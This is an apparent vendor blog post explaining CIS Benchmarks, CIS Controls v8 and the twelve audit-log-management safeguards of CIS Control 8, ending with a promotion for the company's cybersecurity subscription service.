If there is one inescapable fact that all organizations need to face in the changed circumstances, post-pandemic, it is this: putting in place a robust cyber defense system to protect their information assets is no more an option but an imperative. And that can be very daunting. 

For one, there is no dearth of information, tools, and technologies for cybersecurity professionals on how to secure their information assets and infrastructure. 

Then, there are myriad security requirements, standards, risk management frameworks, compliance regimes, and regulatory mandates that need to be met.

This whole process could be overwhelming and could lead to overlooking the imminent threats. The best way to avoid such situations is to look into CIS logs that come under the CIS control 8 of CIS critical security controls version 8.

The Center for Internet Security logs aka CIS logs help collect, review, alert and retain audit logs of cyber events that could help detect, understand and recover from a potential cyber attack.

However, before we could learn more about CIS logs, it’s important that we understand the structure and implementation of CIS controls that are referenced throughout the CIS benchmarks. (Don’t want to learn about CIS benchmarks and CIS controls structure yet? Skip to CIS logs).

What are CIS Benchmarks?

CIS Benchmarks are frameworks that provide a set of configuration standards and best practices to ensure the highest standards of cybersecurity to protect the digital assets of an organization.

Over 100 such benchmarks are available to heighten the cybersecurity of your organization.

CIS Benchmarks are used to meet the security and compliance needs of your organization. Depending upon such needs, each recommendation of the CIS Benchmarks could be assigned 2 profiles:

1. Level 1 profile provides surface-level recommendations which could be quickly implemented.
2. Level 2 profile provides recommendations that deal with areas of heightened security considerations.

Each CIS Benchmark uses CIS controls as CIS controls are referenced throughout the benchmarks.

This brings us to our next question.

What are CIS controls?

CIS Controls are a set of clear and focused actions for organizations to strengthen their cybersecurity. These are separate programs by CIS, however, they are referenced throughout the CIS Benchmarks.

CIS Benchmarks focus on the cybersecurity of a specific system or product whereas CIS controls are implemented to the entire IT system.

CIS security controls version 8 provides 18 CIS controls. These controls could be categorized into the 3 categories:

Basic CIS Controls	Foundational CIS Controls	Organizational CIS Controls
Provide general-purpose security controls that every organization must implement to fundamental cyber readiness.	Provide security controls that focus on technical best practices to target more specific threats.	Are more focused on people and processes. They provide long-term security maturity and must be adopted by organizations internally.

The CIS controls could also be prioritized into Implementation Groups (IGs) based on the risk profiles and available resources of the organizations.

There are 3 such IGs and organizations must self-assess and then decide which IG they belong to and implement the sub controls accordingly.

Implementation Group 1 (IG1)	Implementation Group 2 (IG2)	Implementation Group 3 (IG3)
Those organizations that have limited resources and low data sensitivity, need to implement the sub-controls under this IG.	Organizations with moderate resources and more sensitive data to handle, fall under this group. These organizations must implement IG1 and IG2 both.	These are bigger organizations with significant resources and high-risk exposure for critical data and assets. They must implement IG3 along with IG2 and IG1.

There are 18 CIS controls and discussing all is beyond the scope of this article. We would discuss each control in detail, in another post.

In this post, we primarily focus on CIS control 8 which discusses CIS logs, and probably that’s what you are here for.

CIS logs

Understanding CIS security control 8: Audit Log Management

Why is this CIS control so critical?

Let’s get this clear. Log collection and analysis are critically important to detect any potential malicious attack quickly and respond to them.

Often, the audit records are the only evidence that there has been an attack. And attackers know that organizations mostly use audit log management for compliance purposes only.

Logging records help you detect a potential threat, or whether an attack has happened; if so, when and how it happened; the extent of the attack, what information was accessed, whether any data was exfiltrated?

CIS logs play a critical role in safeguarding the security of your organization, yet, they are often overlooked.

How is CIS security Control 8 implemented?

Prioritization is the core of CIS Security Controls. Although many CIS controls could be implemented based on organizations’ cyber threat profiles, CIS control 8 is extremely important if you want to detect and analyze cyber-attacks.

CIS Security Control 8 guides on how to put in place a comprehensive Audit Log Management system.

It recommends 12 safeguards (very specific actions) that tell you how to establish an audit log management system, how to collect Audit Logs, how to store them securely, and how to review them.

There are 12 safeguards of CIS security control 8 implementations:

1. Establish and Maintain an Audit Log Management Process

Based on your organization’s logging requirements, you might want to establish and maintain an audit log management process.

The process involves:

• Address the collection, retention, and review of the audit log of the assets
• Review and update the documentation as and when there is a significant change(s) that could impact this safeguard.

Asset Type it impacts	Security Function	Implementation Groups
Network	Protect	IG1, IG2, IG3

Any dependencies to execute this process?

• None

2. Audit Logs Collection

You want to make sure that logging has been enabled across the organization’s assets. Collecting audit logs is significant and every vulnerable part of your organization needs to be monitored and logged.

Asset Type it impacts	Security Function	Implementation Groups
Network	Detect	IG1, IG2, IG3

Any dependencies to execute this process?

• Yes

Dependent upon:

• Safeguard 1.1: Talks about establishing and maintaining detailed enterprise asset inventory
• Safeguard 4.1: Talks about establishing and maintaining a secure configuration process
• Safeguard 8.1: Talks about establishing and maintaining an audit log management process

3. Ensure Enough Storage for CIS logs

It’s a nightmare for any organization to think that any malicious activity on their organization’s assets is being logged, only to find that due to insufficient storage, data was not logged and there is no way to know what happened (until sufficient damage is done) and how it happened. Scary!

Hence, ensure that the logging destinations have adequate storage to comply with the organization’s audit log management process.

Asset Type it impacts	Security Function	Implementation Groups
Network	Protect	IG1, IG2, IG3

Any dependencies to execute this process?

• Yes

Dependent upon:

• Safeguard 1.1: Talks about establishing and maintaining detailed enterprise asset inventory

4. Standardize Time Synchronization

• Configure 2 or more synchronized time sources across the enterprise assets wherever supported.

Asset Type it impacts	Security Function	Implementation Groups
Network	Protect	IG2, IG3

Any dependencies to execute this process?

• Yes

Dependent upon:

• Safeguard 1.1: Talks about establishing and maintaining detailed enterprise asset inventory

5. Detailed Audit Logs Collection

Detailed audit logging for the enterprise assets containing sensitive information must be configured.

In order to help with forensic investigation, detailed audit logging could include, but is not limited to:

• Event source
• Date
• Username
• Timestamp
• Source addresses
• Destination addresses

Asset Type it impacts	Security Function	Implementation Groups
Network	Detect	IG2, IG3

Any dependencies to execute this process?

• Yes

Dependent upon:

• Safeguard 1.1: Talks about establishing and maintaining detailed enterprise asset inventory

6. DNS Query Audit Logs Collection

Organizations are vulnerable to network attacks. Digging deeper into DNS query logs could give insightful information about any attacks. You should collect DNS query audit logs for your enterprise assets.

Asset Type it impacts	Security Function	Implementation Groups
Network	Detect	IG2, IG3

Any dependencies to execute this process?

• Yes

• Safeguard 1.1: Talks about establishing and maintaining detailed enterprise asset inventory
• Safeguard 4.1: Talks about establishing and maintaining a secure configuration process

7. URL Requests Audit Logs Collection

Collecting URL requests audit logging could help you find the source of intrusion if any.

Asset Type it impacts	Security Function	Implementation Groups
Network	Detect	IG2, IG3

Any dependencies to execute this process?

• Yes

Dependent upon:

• Safeguard 1.1: Talks about establishing and maintaining detailed enterprise asset inventory
• Safeguard 4.1: Talks about establishing and maintaining a secure configuration process

8. Command Line Audit Logs Collection

Command-line access in the wrong hands could be fatal. This gives a great deal of control to attackers to your enterprise assets. These audit logs give you a heads up of such possible intrusion.

To implement this, you may want to collect audit logs from PowerShell®, BASH™, and other remote administrative terminals.

Asset Type it impacts	Security Function	Implementation Groups
Devices	Detect	IG2, IG3

Any dependencies to execute this process?

• Yes

Dependent upon:

• Safeguard 1.1: Talks about establishing and maintaining detailed enterprise asset inventory
• Safeguard 4.1: Talks about establishing and maintaining a secure configuration process

9. Centralized Audit Logs Collection

Centralize the audit log collections and retention across the enterprise assets, to the extent possible.

Asset Type it impacts	Security Function	Implementation Groups
Network	Detect	IG2, IG3

Any dependencies to execute this process?

• Yes

Dependent upon:

• Safeguard 1.1: Talks about establishing and maintaining detailed enterprise asset inventory
• Safeguard 2.1: Talks about establishing and maintaining a software inventory

10. Retain Audit Logs

Retain audit logs across enterprise assets for a minimum of 3 months.

Asset Type it impacts	Security Function	Implementation Groups
Network	Protect	IG2, IG3

Any dependencies to execute this process?

• Yes

Dependent upon:

• Safeguard 4.1: Talks about establishing and maintaining a secure configuration process
• Safeguard 8.9: Talks about centralizing audit logs

11. Conduct Reviews of Audit Log

Conducting reviews of audit logs helps detect anomalies or abnormal events that could indicate a potential cyber threat. Conduct reviews as frequently as possible.

Asset Type it impacts	Security Function	Implementation Groups
Network	Detect	IG2, IG3

Any dependencies to execute this process?

• None

12. Service Provider Logs Collection

Collect service provider logs, where supported. Example implementations are:

• Collecting authentication and authorization events
• Data creation and disposal events
• User management events

Asset Type it impacts	Security Function	Implementation Groups
Data	Detect	IG3

Any dependencies to execute this process?

• Yes

Dependent upon:

• Safeguard 4.1: Talks about establishing and maintaining a secure configuration process
• Safeguard 15.1: Talks about establishing and maintaining an inventory of service providers

Conclusion

Building a sound cyber defense can be very challenging for organizations. It is even more challenging to have a system in place to monitor and analyze online activities.

This demands proper log implementation and analysis for any potential cyber threats. The CIS logs from CIS security control 8 is the answer.

However, due to a lack of cyber knowledge, constrained by small budgets and limited human resources, a lot of organizations shy away from implementing CIS controls.

The good news is; with Cyvatar’s CSaaS subscription (fixed monthly price) model, cybersecurity is always affordable for SMBs and SMEs.

A quote by Wes Whitteker (Author: Leading effective cybersecurity with critical security controls) will help you set your foot in the right direction.

“If the functions that set an organization’s cybersecurity foundations are flawed, it is very likely that the solutions they choose will be flawed, too.”

We can help you find the right solution for your cybersecurity problems. Talk to our cyber experts now.